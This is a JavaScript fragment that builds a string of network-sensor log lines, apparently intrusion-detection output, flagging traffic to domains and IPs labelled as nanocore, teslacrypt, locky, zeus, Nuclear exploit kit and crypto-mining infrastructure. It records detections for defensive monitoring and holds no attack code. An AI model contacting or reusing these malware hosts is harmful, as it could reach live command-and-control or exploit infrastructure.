    '"2021-01-11 02:14:30.031637" r2d2 2.200.105.226 58874 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:30.031646" r2d2 2.200.105.226 58874 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:43.819041" r2d2 10.43.192.103 57285 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:49.848966" r2d2 10.43.192.103 57286 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:59.608969" r2d2 2.200.110.232 64938 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:14:59.610330" r2d2 2.200.107.146 36570 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:14:59.622181" r2d2 2.200.110.232 49200 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 02:14:59.626120" r2d2 2.200.110.232 64493 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:15:05.854175" r2d2 2.200.110.232 64362 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:15:05.856453" r2d2 2.200.107.146 17851 46.101.179.64 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:15:07.420192" r2d2 2.200.110.232 63624 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:15:07.421722" r2d2 2.200.107.146 53939 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:15:07.553602" r2d2 2.200.110.233 64188 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 02:15:07.952728" r2d2 10.43.192.103 57301 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:15:09.366237" r2d2 2.200.110.232 65514 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:15:09.397061" r2d2 2.200.110.233 63308 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:15:13.981680" r2d2 10.43.192.103 57302 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:15:24.986850" r2d2 2.200.110.232 64009 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:15:26.054943" r2d2 10.43.192.103 57304 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:15:44.159434" r2d2 10.43.192.103 57361 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:15:45.457683" r2d2 2.200.104.32 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:45.753788" r2d2 192.168.30.246 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:45.148463" r2d2 2.200.104.32 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:45.148070" r2d2 192.168.30.246 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:44.838491" r2d2 2.200.104.32 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:46.716072" r2d2 10.1.19.42 59321 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:44.838111" r2d2 192.168.30.246 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:56.227207" r2d2 10.43.192.103 57385 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:15:49.711522" r2d2 2.200.104.32 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:50.463843" r2d2 192.168.30.246 59149 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:15:59.620272" r2d2 2.200.110.232 65342 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:16:02.259335" r2d2 10.43.192.103 57391 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:16:08.303840" r2d2 10.43.192.103 57393 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:16:14.337444" r2d2 10.43.192.103 57394 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:16:17.608797" r2d2 2.200.110.233 63460 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:16:19.408702" r2d2 2.200.110.232 64038 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:16:19.435630" r2d2 2.200.110.233 64783 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:16:22.084288" r2d2 2.200.104.184 50009 192.58.128.30 53 UDP DNS (equited-basects).icu "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:16:22.126948" r2d2 2.200.104.184 65264 205.251.193.77 53 UDP DNS (equited-basects).icu "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:16:22.243271" r2d2 2.200.104.184 62300 205.251.193.77 53 UDP DNS (equited-basects).icu "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:16:17.627233" r2d2 10.36.192.126 59350,59357 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:16:26.409673" r2d2 10.43.192.103 57396 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:16:31.242643" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:31.342399" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:31.444710" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:31.642537" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:31.942694" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:32.343321" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:32.844586" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:33.444391" r2d2 10.3.160.42 26027 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:16:43.387855" r2d2 2.200.110.232 49372 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:16:44.511828" r2d2 10.43.192.103 57399 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:16:41.830098" r2d2 10.36.192.126 59433 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:16:56.589125" r2d2 10.43.192.103 57401 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:17:02.622838" r2d2 10.43.192.103 57402 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:17:14.695828" r2d2 10.43.192.103 57404 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:17:29.440596" r2d2 2.200.110.232 49361 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:17:29.467833" r2d2 2.200.110.233 65329 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:17:32.814189" r2d2 10.43.192.103 57407 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:17:28.803751" r2d2 10.1.19.42 59329 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:17:41.050512" r2d2 178.17.174.14 43632 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; GTB7.5; chromeframe/30.0.1599.14; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; AskTbBCPA/5.15.4.23821\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:17:44.566258" r2d2 2.200.97.1 64337 8.8.8.8 53 UDP DNS checkip.dyndns.com "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:17:44.883255" r2d2 10.43.192.103 57409 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:17:41.050522" r2d2 178.17.174.14 43632 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; GTB7.5; chromeframe/30.0.1599.14; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; AskTbBCPA/5.15.4.23821\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:17:41.050519" r2d2 178.17.174.14 43632 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; GTB7.5; chromeframe/30.0.1599.14; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; AskTbBCPA/5.15.4.23821\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:17:50.930313" r2d2 10.43.192.103 57410 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:17:59.608813" r2d2 2.200.110.232 64897 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:17:59.611250" r2d2 2.200.107.146 31248 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:18:15.030062" r2d2 10.43.192.103 57415 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:18:27.101203" r2d2 10.43.192.103 57417 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:18:33.143863" r2d2 10.43.192.103 57418 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:18:39.474807" r2d2 2.200.110.232 65147 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:18:39.506112" r2d2 2.200.110.233 65066 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:18:45.215096" r2d2 10.43.192.103 57420 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:19:01.712193" r2d2 2.200.107.146 31976 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:19:01.710754" r2d2 2.200.110.232 64557 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:19:01.734175" r2d2 2.200.110.233 63766 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:19:03.323418" r2d2 10.43.192.103 57423 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:19:15.399500" r2d2 10.43.192.103 57425 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:19:21.434398" r2d2 10.43.192.103 57426 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:19:33.509638" r2d2 10.43.192.103 57428 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:19:43.383329" r2d2 2.200.110.232 65293 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:19:43.395986" r2d2 2.200.110.232 64353 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:19:43.397908" r2d2 2.200.107.146 33980 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:19:49.516767" r2d2 2.200.110.233 64273 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:19:51.618711" r2d2 10.43.192.103 57433 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:20:09.715671" r2d2 10.43.192.103 57463 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:20:21.787898" r2d2 10.43.192.103 57488 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:20:27.817781" r2d2 10.43.192.103 57491 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:20:31.622071" r2d2 10.3.160.42 26029 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:20:31.723537" r2d2 10.3.160.42 26029 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:20:31.822300" r2d2 10.3.160.42 26029 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:20:32.021858" r2d2 10.3.160.42 26029 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:20:32.321844" r2d2 10.3.160.42 26029 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:20:32.721992" r2d2 10.3.160.42 26029 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:20:39.887762" r2d2 10.43.192.103 57493 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:20:45.919718" r2d2 10.43.192.103 57494 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:20:59.517340" r2d2 2.200.110.232 63697 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:20:59.519044" r2d2 2.200.107.146 9116 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:20:59.543405" r2d2 2.200.110.233 64377 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:20:59.608891" r2d2 2.200.110.232 64965 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:20:59.609042" r2d2 2.200.110.232 63484 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:21:04.033025" r2d2 10.43.192.103 57499 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:10.071324" r2d2 10.43.192.103 57501 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:16.103387" r2d2 10.43.192.103 57502 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:28.175141" r2d2 10.43.192.103 57504 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:28.762066" r2d2 2.200.105.226 58122 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:28.762074" r2d2 2.200.105.226 58122 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:28.762225" r2d2 2.200.105.226 58122 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:28.792256" r2d2 2.200.105.226 59324 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:28.792263" r2d2 2.200.105.226 59324 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:29.727425" r2d2 2.200.110.232 49279 2.200.107.168 53 UDP DNS (www).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:21:29.733251" r2d2 2.200.107.146 45781 173.245.59.92 53 UDP DNS reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:21:29.911252" r2d2 178.17.174.14 58436 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QS 4.2.4.0; QS 5.1.2.1; FunWebProducts; BTRS122412; GTB7.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; QS 4.2.4.0; QS 5.1.2.1; FunWebProducts; BOIE8;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:21:29.911249" r2d2 178.17.174.14 58436 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QS 4.2.4.0; QS 5.1.2.1; FunWebProducts; BTRS122412; GTB7.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; QS 4.2.4.0; QS 5.1.2.1; FunWebProducts; BOIE8;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:21:29.911254" r2d2 178.17.174.14 58436 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QS 4.2.4.0; QS 5.1.2.1; FunWebProducts; BTRS122412; GTB7.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; QS 4.2.4.0; QS 5.1.2.1; FunWebProducts; BOIE8;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:21:46.290973" r2d2 10.43.192.103 57507 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:21:53.605704" r2d2 2.200.110.233 64492 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:21:53.607888" r2d2 2.200.107.146 49078 54.226.255.149 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:22:04.397707" r2d2 10.43.192.103 57520 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:22:07.643114" r2d2 2.200.107.146 41858 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:22:07.641299" r2d2 2.200.110.232 63507 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:22:07.672541" r2d2 2.200.110.233 65433 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:22:07.683464" r2d2 2.200.110.233 64473 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:22:07.690855" r2d2 2.200.110.233 63904 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:22:08.564213" r2d2 2.200.110.233 64310 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:22:09.548899" r2d2 2.200.110.232 65514 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:22:09.579696" r2d2 2.200.110.233 64889 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:22:13.012393" r2d2 2.200.104.32 56671,62671 2.23.97.208,2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:10.446511" r2d2 10.36.192.126 59519 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:13.011682" r2d2 192.168.30.241 56671 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:14.185546" r2d2 192.168.30.244 62671 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:16.459031" r2d2 10.43.192.103 57523 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:22:13.012391" r2d2 2.200.104.32 56671,62671 2.23.97.208,2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:13.035243" r2d2 192.168.30.241 56671 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:14.160454" r2d2 192.168.30.244 62671 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:13.058598" r2d2 2.200.104.32 56671,62671 2.23.97.208,2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:13.011677" r2d2 192.168.30.241 56671 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:14.133971" r2d2 192.168.30.244 62671 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:22:28.523929" r2d2 10.43.192.103 57536 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:22:31.811771" r2d2 10.3.160.42 26030 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:22:32.012768" r2d2 10.3.160.42 26030 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:22:32.211821" r2d2 10.3.160.42 26030 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:22:32.516681" r2d2 10.3.160.42 26030 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:22:32.911728" r2d2 10.3.160.42 26030 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:22:33.411629" r2d2 10.3.160.42 26030 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:22:43.382689" r2d2 2.200.110.232 64642 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:22:43.384313" r2d2 2.200.107.146 28186 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:22:43.394814" r2d2 2.200.107.146 19699 194.169.218.42 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:22:43.393455" r2d2 2.200.110.232 65055 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:22:52.643341" r2d2 10.43.192.103 57573 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:22:58.674538" r2d2 10.43.192.103 57574 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:22:59.626436" r2d2 2.200.110.232 64051 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:23:10.749868" r2d2 10.43.192.103 57576 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:23:17.311609" r2d2 2.200.110.232 65023 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:23:17.313320" r2d2 2.200.107.146 30626 192.42.93.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:23:17.355507" r2d2 2.200.110.233 65428 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:23:17.643851" r2d2 2.200.110.233 63436 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:23:17.645624" r2d2 2.200.107.146 32222 173.201.68.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:23:18.234909" r2d2 2.200.107.146 1080 193.232.156.17 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
